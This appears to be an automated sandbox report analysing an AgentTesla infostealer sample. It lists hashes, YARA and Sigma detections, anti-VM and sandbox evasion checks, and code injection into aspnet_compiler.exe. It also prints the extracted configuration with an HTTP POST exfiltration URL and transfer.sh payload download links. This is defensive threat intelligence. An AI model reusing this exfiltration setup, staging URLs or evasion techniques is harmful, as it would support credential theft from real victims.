Create Interactive Tour

Windows Analysis Report
AgentTesla.exe

Overview

General Information

Sample Name:AgentTesla.exe
Analysis ID:588752
MD5:81448798cca71e2b8bce354afcf098b4
SHA1:29c1fbbaad4d5b988b570741b733120801f7ebcc
SHA256:c92c2d345803369fe8d343b1c894c1dc82e0c8b855c83d3cdb07c179e108aa78
Tags:AgentTeslaexesigned
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Detected unpacking (changes PE section rights)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
.NET source code contains potential unpacker
.NET source code contains method to dynamically call methods (often used by packers)
PE file contains section with special chars
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sigma detected: Suspicious aspnet_compiler.exe Execution
PE file contains sections with non-standard names
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Entry point lies outside standard sections
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains capabilities to detect virtual machines
PE / OLE file has an invalid certificate
Queries disk information (often used to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • AgentTesla.exe (PID: 6368 cmdline: "C:\Users\user\Desktop\AgentTesla.exe" MD5: 81448798CCA71E2B8BCE354AFCF098B4)
    • aspnet_compiler.exe (PID: 1248 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
  • cleanup
{
  "Exfil Mode": "Http",
  "HTTP method": "Post",
  "Post URL": "https://agusanplantation.com/v/v/inc/9c523a9e14cc09.php",
  "User Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0"
}
SourceRuleDescriptionAuthorStrings
AgentTesla.exeSUSP_NVIDIA_LAPSUS_Leak_Compromised_Cert_Mar22_1Detects a binary signed with the leaked NVIDIA certifcate and compiled after March 1st 2022Florian Roth
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.393648986.0000000006E39000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000000.00000002.393648986.0000000006E39000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
        Process Memory Space: AgentTesla.exe PID: 6368JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          SourceRuleDescriptionAuthorStrings
          0.2.AgentTesla.exe.6ec9a88.6.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            0.2.AgentTesla.exe.6ec9a88.6.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              0.2.AgentTesla.exe.6ec9a88.6.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
              • 0x2efaf:$s1: get_kbok
              • 0x2f8e3:$s2: get_CHoo
              • 0x3053e:$s3: set_passwordIsSet
              • 0x2edb3:$s4: get_enableLog
              • 0x3347f:$s8: torbrowser
              • 0x31e62:$s10: logins
              • 0x317da:$s11: credential
              • 0x2e19b:$g1: get_Clipboard
              • 0x2e1a9:$g2: get_Keyboard
              • 0x2e1b6:$g3: get_Password
              • 0x2f791:$g4: get_CtrlKeyDown
              • 0x2f7a1:$g5: get_ShiftKeyDown
              • 0x2f7b2:$g6: get_AltKeyDown
              0.2.AgentTesla.exe.6ec9a88.6.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                0.2.AgentTesla.exe.6ec9a88.6.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                  Click to see the 1 entries

                  There are no malicious signatures, click here to show all signatures.

                  Source: Process startedAuthor: frack113: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\Desktop\AgentTesla.exe" , ParentImage: C:\Users\user\Desktop\AgentTesla.exe, ParentProcessId: 6368, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 1248

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: 0.2.AgentTesla.exe.6ec9a88.6.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Http", "HTTP method": "Post", "Post URL": "https://agusanplantation.com/v/v/inc/9c523a9e14cc09.php", "User Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0"}
                  Source: AgentTesla.exeVirustotal: Detection: 31%Perma Link
                  Source: AgentTesla.exeReversingLabs: Detection: 44%
                  Source: AgentTesla.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                  Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.7:49767 version: TLS 1.2
                  Source: Binary string: DDDHJYUTYE.pdb source: AgentTesla.exe, AgentTesla.exe, 00000000.00000002.381081801.0000000001312000.00000040.00000001.01000000.00000003.sdmp, AgentTesla.exe, 00000000.00000003.349626224.0000000001040000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: E:\scljenkins-slv\workspace\Build-Job_ADLM_FY21-10.2-release@2\develop\global\src\build\win32\MSVS14\Release\Release\adlmint.pdb source: AgentTesla.exe
                  Source: Binary string: Z:\Oreans Projects\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: AgentTesla.exe, 00000000.00000002.381808674.000000000157E000.00000040.00000001.01000000.00000003.sdmp
                  Source: Binary string: Bellbellbell.pdb source: AgentTesla.exe, 00000000.00000002.388340755.0000000005EBE000.00000004.00000800.00020000.00000000.sdmp, AgentTesla.exe, 00000000.00000002.387753508.0000000005400000.00000004.08000000.00040000.00000000.sdmp
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: global trafficHTTP traffic detected: GET /get/jwhuCr/devvvv.txt HTTP/1.1Host: transfer.shConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /get/iGs052/BASE64.txt HTTP/1.1Host: transfer.sh
                  Source: Joe Sandbox ViewIP Address: 144.76.136.153 144.76.136.153
                  Source: Joe Sandbox ViewIP Address: 144.76.136.153 144.76.136.153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                  Source: AgentTesla.exeString found in binary or memory: http://169.254.169.254/http://169.254.169.254/latest/meta-datalatest/meta-data/public-ipv4%clatest/m
                  Source: AgentTesla.exe, 00000000.00000002.380753556.00000000009A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: AgentTesla.exeString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                  Source: AgentTesla.exeString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                  Source: AgentTesla.exeString found in binary or memory: http://ocsp.sectigo.com0
                  Source: AgentTesla.exeString found in binary or memory: http://rb.symcb.com/rb.crl0W
                  Source: AgentTesla.exeString found in binary or memory: http://rb.symcb.com/rb.crt0
                  Source: AgentTesla.exeString found in binary or memory: http://rb.symcd.com0&
                  Source: AgentTesla.exeString found in binary or memory: http://s.symcb.com/universal-root.crl0
                  Source: AgentTesla.exeString found in binary or memory: http://s.symcd.com0
                  Source: AgentTesla.exe, 00000000.00000002.388115221.0000000005E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: AgentTesla.exeString found in binary or memory: http://www.macrovision.com/fnp/2004/11/activation
                  Source: AgentTesla.exeString found in binary or memory: https://d.symcb.com/cps0%
                  Source: AgentTesla.exeString found in binary or memory: https://d.symcb.com/rpa0
                  Source: AgentTesla.exeString found in binary or memory: https://d.symcb.com/rpa06
                  Source: AgentTesla.exeString found in binary or memory: https://sectigo.com/CPS0D
                  Source: AgentTesla.exe, 00000000.00000002.388115221.0000000005E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh
                  Source: AgentTesla.exe, 00000000.00000002.388115221.0000000005E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/jwhuCr/devvvv.txt
                  Source: AgentTesla.exe, 00000000.00000002.393648986.0000000006E39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                  Source: unknownDNS traffic detected: queries for: transfer.sh
                  Source: global trafficHTTP traffic detected: GET /get/jwhuCr/devvvv.txt HTTP/1.1Host: transfer.shConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /get/iGs052/BASE64.txt HTTP/1.1Host: transfer.sh
                  Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.7:49767 version: TLS 1.2

                  System Summary

                  barindex
                  Source: 0.2.AgentTesla.exe.6ec9a88.6.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                  Source: 0.2.AgentTesla.exe.6ec9a88.6.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                  Source: AgentTesla.exeStatic PE information: section name:
                  Source: AgentTesla.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                  Source: AgentTesla.exe, type: SAMPLEMatched rule: SUSP_NVIDIA_LAPSUS_Leak_Compromised_Cert_Mar22_1 date = 2022-03-03, author = Florian Roth, description = Detects a binary signed with the leaked NVIDIA certifcate and compiled after March 1st 2022, score = https://twitter.com/cyb3rops/status/1499514240008437762, modified = 2022-03-04
                  Source: 0.2.AgentTesla.exe.6ec9a88.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                  Source: 0.2.AgentTesla.exe.6ec9a88.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                  Source: C:\Users\user\Desktop\AgentTesla.exeCode function: 0_2_011404480_2_01140448
                  Source: C:\Users\user\Desktop\AgentTesla.exeCode function: 0_2_011484B00_2_011484B0
                  Source: C:\Users\user\Desktop\AgentTesla.exeCode function: 0_2_011404170_2_01140417
                  Source: C:\Users\user\Desktop\AgentTesla.exeCode function: 0_2_011408B80_2_011408B8
                  Source: C:\Users\user\Desktop\AgentTesla.exeCode function: 0_2_011408A80_2_011408A8
                  Source: C:\Users\user\Desktop\AgentTesla.exeCode function: 0_2_01140B580_2_01140B58
                  Source: C:\Users\user\Desktop\AgentTesla.exeCode function: 0_2_01140B490_2_01140B49
                  Source: AgentTesla.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
                  Source: AgentTesla.exe, 00000000.00000002.388340755.0000000005EBE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBellbellbell.dll: vs AgentTesla.exe
                  Source: AgentTesla.exe, 00000000.00000002.380619435.0000000000930000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs AgentTesla.exe
                  Source: AgentTesla.exe, 00000000.00000002.387753508.0000000005400000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameBellbellbell.dll: vs AgentTesla.exe
                  Source: AgentTesla.exe, 00000000.00000002.381772595.000000000155F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDDDHJYUTYE.exe8 vs AgentTesla.exe
                  Source: AgentTesla.exe, 00000000.00000002.393648986.0000000006E39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamehHUWRBgosOmdPBogRCMhHNGgzDCudeuFBxvz.exe4 vs AgentTesla.exe
                  Source: AgentTesla.exeBinary or memory string: OriginalFilenameDDDHJYUTYE.exe8 vs AgentTesla.exe
                  Source: AgentTesla.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: AgentTesla.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: AgentTesla.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: AgentTesla.exeStatic PE information: invalid certificate
                  Source: AgentTesla.exeStatic PE information: Section: ZLIB complexity 1.00027760428
                  Source: AgentTesla.exeVirustotal: Detection: 31%
                  Source: AgentTesla.exeReversingLabs: Detection: 44%
                  Source: C:\Users\user\Desktop\AgentTesla.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\AgentTesla.exe "C:\Users\user\Desktop\AgentTesla.exe"
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AgentTesla.exe.logJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeFile created: C:\Users\user~1\AppData\Local\Temp\~DF6462815E21D3E8A8.TMPJump to behavior
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@3/2@1/1
                  Source: C:\Users\user\Desktop\AgentTesla.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                  Source: AgentTesla.exeString found in binary or memory: or the hosts file is incorrect. Workaround: Use IP-Address
                  Source: AgentTesla.exeString found in binary or memory: lmutil lmborrow -startupdate was issued but not updated yet.
                  Source: AgentTesla.exeString found in binary or memory: lmpath command.Trusted Storage is invalid, and needs to be repaired.SUPERSEDE and SUPERSEDE_SIGN can not be used at the same time.Hostname lmutil lmborrow -startupdate was issued but not updated yet.
                  Source: AgentTesla.exeString found in binary or memory: Insufficient privilege to talk to the Windows Service Control Manager - set the FlexNet Licensing Service to auto-start
                  Source: AgentTesla.exeString found in binary or memory: The FlexNet Licensing Service is marked for delete - reboot & then re-install
                  Source: AgentTesla.exeString found in binary or memory: Insufficient privilege to talk to the FlexNet Licensing Service - set the service to auto-start
                  Source: AgentTesla.exeString found in binary or memory: The FlexNet Licensing Service is incorrectly configured; please re-install
                  Source: AgentTesla.exeString found in binary or memory: \\.\pipe\FlexNet Licensing ServiceABF27A87-DC96-4b05-A06B-83EB2749B800The FlexNet Licensing Service failed to startCould not create named pipeCould not open named pipe: 1 second wait timed outNot able to open the named pipe handleNot able to write to the named pipeThe FlexNet Licensing Service is disabledInsufficient privilege to talk to the Windows Service Control Manager - set the FlexNet Licensing Service to auto-startThe FlexNet Licensing Service is not installedThe FlexNet Licensing Service is marked for delete - reboot & then re-installThe FlexNet Licensing Service is already running - no action requiredInsufficient privilege to talk to the FlexNet Licensing Service - set the service to auto-startThe Windows Service Control Manager has a database lock - check which app is using itThe FlexNet Licensing Service is incorrectly configured; please re-installThe FlexNet Licensing Service is not installedFlexNet Licensing Service%^%^%^VMAttrs%u
                  Source: AgentTesla.exeString found in binary or memory: \\.\pipe\FlexNet Licensing ServiceABF27A87-DC96-4b05-A06B-83EB2749B800The FlexNet Licensing Service failed to startCould not create named pipeCould not open named pipe: 1 second wait timed outNot able to open the named pipe handleNot able to write to the named pipeThe FlexNet Licensing Service is disabledInsufficient privilege to talk to the Windows Service Control Manager - set the FlexNet Licensing Service to auto-startThe FlexNet Licensing Service is not installedThe FlexNet Licensing Service is marked for delete - reboot & then re-installThe FlexNet Licensing Service is already running - no action requiredInsufficient privilege to talk to the FlexNet Licensing Service - set the service to auto-startThe Windows Service Control Manager has a database lock - check which app is using itThe FlexNet Licensing Service is incorrectly configured; please re-installThe FlexNet Licensing Service is not installedFlexNet Licensing Service%^%^%^VMAttrs%u
                  Source: 0.2.AgentTesla.exe.1310000.0.unpack, vow0il84A6EO1Kr9ou/SCN2OOxFlCTgsvtZ3Y.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.AgentTesla.exe.1310000.0.unpack, vow0il84A6EO1Kr9ou/SCN2OOxFlCTgsvtZ3Y.csCryptographic APIs: 'CreateDecryptor'
                  Source: C:\Users\user\Desktop\AgentTesla.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: AgentTesla.exeStatic file information: File size 7255264 > 1048576
                  Source: AgentTesla.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x257400
                  Source: AgentTesla.exeStatic PE information: Raw size of .boot is bigger than: 0x100000 < 0x48b3c9
                  Source: Binary string: DDDHJYUTYE.pdb source: AgentTesla.exe, AgentTesla.exe, 00000000.00000002.381081801.0000000001312000.00000040.00000001.01000000.00000003.sdmp, AgentTesla.exe, 00000000.00000003.349626224.0000000001040000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: E:\scljenkins-slv\workspace\Build-Job_ADLM_FY21-10.2-release@2\develop\global\src\build\win32\MSVS14\Release\Release\adlmint.pdb source: AgentTesla.exe
                  Source: Binary string: Z:\Oreans Projects\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: AgentTesla.exe, 00000000.00000002.381808674.000000000157E000.00000040.00000001.01000000.00000003.sdmp
                  Source: Binary string: Bellbellbell.pdb source: AgentTesla.exe, 00000000.00000002.388340755.0000000005EBE000.00000004.00000800.00020000.00000000.sdmp, AgentTesla.exe, 00000000.00000002.387753508.0000000005400000.00000004.08000000.00040000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  Source: C:\Users\user\Desktop\AgentTesla.exeUnpacked PE file: 0.2.AgentTesla.exe.1310000.0.unpack :ER;.rsrc:R;.reloc:R;.imports:W;.winlice:EW;.boot:ER; vs :ER;.rsrc:R;
                  Source: 0.2.AgentTesla.exe.1310000.0.unpack, e1ccJ0qv7RfG4GSGJI/FPJA5U6Tu7mmnQx7dF.cs.Net Code: PtNESGOel System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 0.2.AgentTesla.exe.1310000.0.unpack, vow0il84A6EO1Kr9ou/SCN2OOxFlCTgsvtZ3Y.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                  Source: C:\Users\user\Desktop\AgentTesla.exeCode function: 0_2_01144173 push cs; retf 0_2_01144174
                  Source: AgentTesla.exeStatic PE information: section name:
                  Source: AgentTesla.exeStatic PE information: section name: .imports
                  Source: AgentTesla.exeStatic PE information: section name: .winlice
                  Source: AgentTesla.exeStatic PE information: section name: .boot
                  Source: initial sampleStatic PE information: section where entry point is pointing to: .boot
                  Source: initial sampleStatic PE information: section name: entropy: 7.95088629607
                  Source: 0.2.AgentTesla.exe.1310000.0.unpack, vow0il84A6EO1Kr9ou/SCN2OOxFlCTgsvtZ3Y.csHigh entropy of concatenated method names: '.cctor', 'jJwiO5tbmtsyW', 'w73O15vWR', 'feM0EvWfY', 'AxF4YwBNM', 'yMtXnt5D3', 'MEOIm1N42', 'GdCdovfPQ', 'DqIsAtvRa', 'IkWRbRNOA'
                  Source: 0.2.AgentTesla.exe.1310000.0.unpack, DDDHJYUTYE/Form1.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'FPJ6A5UTu', 'x6xvqGw9ckUH4OCF25', 'rVBNEbVbRZuttbPJB1', 'aJetrv5ApVyjpETkX2', 'sgTBxlW3ZrPY4gDaV6', 'UR2fE9kFq1rMVGUUt8', 'ChtyYB85Lepmjx3QNq', 'oXVFAwBNmUELkiZOPw'
                  Source: 0.2.AgentTesla.exe.1310000.0.unpack, e1ccJ0qv7RfG4GSGJI/FPJA5U6Tu7mmnQx7dF.csHigh entropy of concatenated method names: 'PtNESGOel', 'HJpJAPsTL', 'YEf0ulT8HOoJV8FjlH', 'G5vQ10SRpLbIjy9m1B', 'tShhgdG9BU6r5sbnGw', 'KSrpRDY7Wsh3I3Z38d', 'mN7PmYNA0xZoLtOPor'
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\Desktop\AgentTesla.exeSystem information queried: FirmwareTableInformationJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeSystem information queried: FirmwareTableInformationJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exe TID: 6236Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exe TID: 4224Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosDateJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeSystem information queried: ModuleInformationJump to behavior
                  Source: AgentTesla.exeBinary or memory string: VMware
                  Source: AgentTesla.exeBinary or memory string: GoogleCompute detectedAmazonEC2 detectedVMWare detectedXEN detectedQEMU detectedUnknown hypervisor detectedHyper-V detectedCorrection - XEN detectedCorrection - CPUID data block search indicates QEMU detectedCorrection - WMI indicates Physical machinePhysical machine detectedXEN detectedVMWare detectedVirtualBox detectedQemu detectedParallels detectedUnknown hypervisor detectedUnknown hypervisor detectedPhysical machine detectedHypervisor detectedFAKE VM detectedLocal\{a3d0d9cf-ef71-409f-acb2-91dca7237f13}-%lx-s_vm_initHypervisor detectedFAKE VM detected (non-privileged)CPUID Hyper-V Signature rejectedflexFilterServerNew: Could not alloc memoryflexFilterServerConnect: Could not get inet address
                  Source: AgentTesla.exeBinary or memory string: VMwareVMware detected
                  Source: AgentTesla.exeBinary or memory string: Qemu detected
                  Source: AgentTesla.exeBinary or memory string: QEMU Virtual CPU
                  Source: AgentTesla.exeBinary or memory string: WMI checking for VM_WMI_QEMU
                  Source: AgentTesla.exeBinary or memory string: VMWare detected
                  Source: AgentTesla.exeBinary or memory string: Populating VMWARE Attributes....
                  Source: AgentTesla.exeBinary or memory string: VMWARE
                  Source: AgentTesla.exeBinary or memory string: Hyper-V detected
                  Source: AgentTesla.exeBinary or memory string: s_vm_wmi_VMware_detection - VMware not detected
                  Source: AgentTesla.exeBinary or memory string: Correction - CPUID data block search indicates QEMU detected
                  Source: AgentTesla.exeBinary or memory string: CPUID Hyper-V Signature rejected
                  Source: AgentTesla.exeBinary or memory string: s_vm_wmi_VMware_detection - VMware detected
                  Source: AgentTesla.exeBinary or memory string: WMI checking for VM_WMI_VMWARE
